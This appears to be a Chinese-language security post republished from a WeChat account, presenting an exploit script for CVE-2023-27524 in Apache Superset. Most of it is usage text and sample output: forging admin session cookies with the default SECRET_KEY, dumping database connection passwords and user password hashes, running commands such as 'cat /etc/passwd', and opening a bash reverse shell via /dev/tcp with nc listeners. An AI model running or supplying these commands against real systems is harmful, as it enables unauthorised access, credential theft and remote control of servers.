Apache Superset 是一种广泛使用的数据可视化和探索开源工具,已被确定存在潜在的安全漏洞,可能导致身份验证绕过和远程代码执行 (RCE)。这些漏洞可能使恶意行为者能够获得目标服务器上的管理权限,从而使他们能够收集用户凭据并可能危及数据。
所涉及的具体安全问题是一个不安全的默认配置漏洞,称为 CVE-2023-27524。
根本原因在于安装过程中设置的可预测的 Flask Secret Key,影响了大量暴露的 Apache Superset 实例。尽管已经采取了一些缓解措施,但对于那些尚未更新其配置的人来说,此漏洞仍然是一个严重的问题。
官方漏洞描述:
Apache Superset 2.0.1 及之前版本中的会话验证攻击。未根据安装说明更改默认配置的 SECRET_KEY 的安装允许攻击者验证和访问未经授权的资源。这不会影响更改 SECRET_KEY 配置默认值的 Superset 管理员。
用法
安装 PIP 包:
pip3 install -r requirements.txt usage: exploit.py [-h] --url URL [--id ID] [--wordlist WORDLIST] [--validate] [--enum-dbs] [--enum-users] [--cmd CMD][--revshell REVSHELL] [--db-host]options:-h, --help show this help message and exit--url URL, -u URL Host URL--id ID User ID to forge session cookie for. Default=1--wordlist WORDLIST, -w WORDLISTSpecify a wordlist file (default is 10.txt)--validate, -v Validate the presence of vulnerability by login attempt--enum-dbs, -dbs Enumerate databases--enum-users, -eu Enumerate databases--cmd CMD, -c CMD Run custom OS command on the database's server.--revshell REVSHELL Specify IP:Port for reverse shell--db-host Run commands or open reverse shell on the database server
验证漏洞并尝试使用自定义单词列表破解应用程序
[] Session cookie found.[] Decoded session cookie: <REDACTED>[] Using '10k_most_common_passwords.txt' as a wordlist.[] Superset instance is VULNERABLE to CVE-2023-27524.[] Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'[] Forged session cookie for user 1: <REDACTED>[] Superset Version: 2.0.1[] Login successful. Vulnerability is validated.
枚举数据库
[] Session cookie found.[] Decoded session cookie:{'csrf_token': '5d4c9ad6caf94bc1c652b0fc8e8739d19c45c05a', 'locale': 'en'}[] Using default secret keys.[] Superset instance is VULNERABLE to CVE-2023-27524.[] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"[] Forged session cookie for user 1:eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsQ6Q.nKTBZiUq-Cu0iWSLQIUtB2W9HnM[] Version 2.0.1 seems vulnerable.[] Enumerating databases via API...[] Found database: "examples" with password "superset".[] Found database: "SQLite".[] Enumerating database connection data and cracking password if possible...+-----------------+---------------------------------------------------+--------------------------+----------------------+| database_name | sqlalchemy_uri | password | decrypted_password ||-----------------+---------------------------------------------------+--------------------------+----------------------|| examples | postgresql://superset:XXXXXXXXXX@db:5432/superset | MAqp6AIikZpDM5bMH4MMgA== | superset******** || SQLite | sqlite+pysqlite:////app/superset_home/superset.db | | |+-----------------+---------------------------------------------------+--------------------------+----------------------+[] Process of enumerating databases finished.
枚举 Superset 用户
[] Session cookie found.[] Decoded session cookie:{'csrf_token': '2a3adb09bac36c330a77c74da1cca27c431779e8', 'locale': 'en'}[] Using default secret keys.[] Superset instance is VULNERABLE to CVE-2023-27524.[] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"[] Forged session cookie for user 1:eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsRCQ.qeci7JgO5Lb4AwexB0Qojp5RDbs[] Version 2.0.1 seems vulnerable.[] Checking existing metadata database connection...[] Settings of database with id 1 were successfully modified.[] Settings of database with id 2 were successfully modified.[] Superset metadata connection is already added with id 2.[] Trying to enumerate Superset users...[] RESULT:+------------+--------------------------------------------------------------------------------------------------------+| username | password ||------------+--------------------------------------------------------------------------------------------------------|| admin | pbkdf2:sha256:260000$z5y5YnluWzyx4kd2$33c40dfefdea9aedef6ed171a941492516ba49c1ed8ed740d7e05446ce639c0e |+------------+--------------------------------------------------------------------------------------------------------+
运行自定义操作系统命令
在 Superset 服务器上:
python3 exploit.py --url http://localhost:8088 --cmd 'bash -i >& /dev/tcp/<IP>/4242 0>&1'请注意,在这种情况下还无法查看输出。
在数据库服务器上:
# python3 exploit.py -u http://localhost:8088 --cmd 'cat /etc/passwd' --db-host[+] Session cookie found.[+] Decoded session cookie:{'csrf_token': 'c2154d7077f507bd69c791f9d6de49115ba290a3', 'locale': 'en'}[+] Using default secret keys.[+] Superset instance is VULNERABLE to CVE-2023-27524.[+] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"[+] Forged session cookie for user 1:eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsRMw.haTjE2XBuVjamMvsdg7SemBr3Ig[+] Version 2.0.1 seems vulnerable.[+] Trying to run command on the database server...[+] Settings of database with id 1 were successfully modified.[+] $ cat /etc/passwd+-----------------------------------------------------------------------------------+| cmd_output ||-----------------------------------------------------------------------------------|| root:x:0:0:root:/root:/bin/bash || daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin || <REDACTED> || postgres:x:999:999::/var/lib/postgresql:/bin/bash |+-----------------------------------------------------------------------------------+
打开反向shell
在 Superset 服务器上:
# Terminal 1nc -lvnp# Terminal 2python3 exploit.py -u http://localhost:8088 --revshell
在数据库服务器上:
# Terminal 1nc -lvnp [PORT]# Terminal 2python3 exploit.py -u http://localhost:8088 --revshell [IP]:[PORT] --db-host
原文始发于微信公众号(Khan安全团队):CVE-2023-27524:Apache Superset Auth 绕过和 RCE
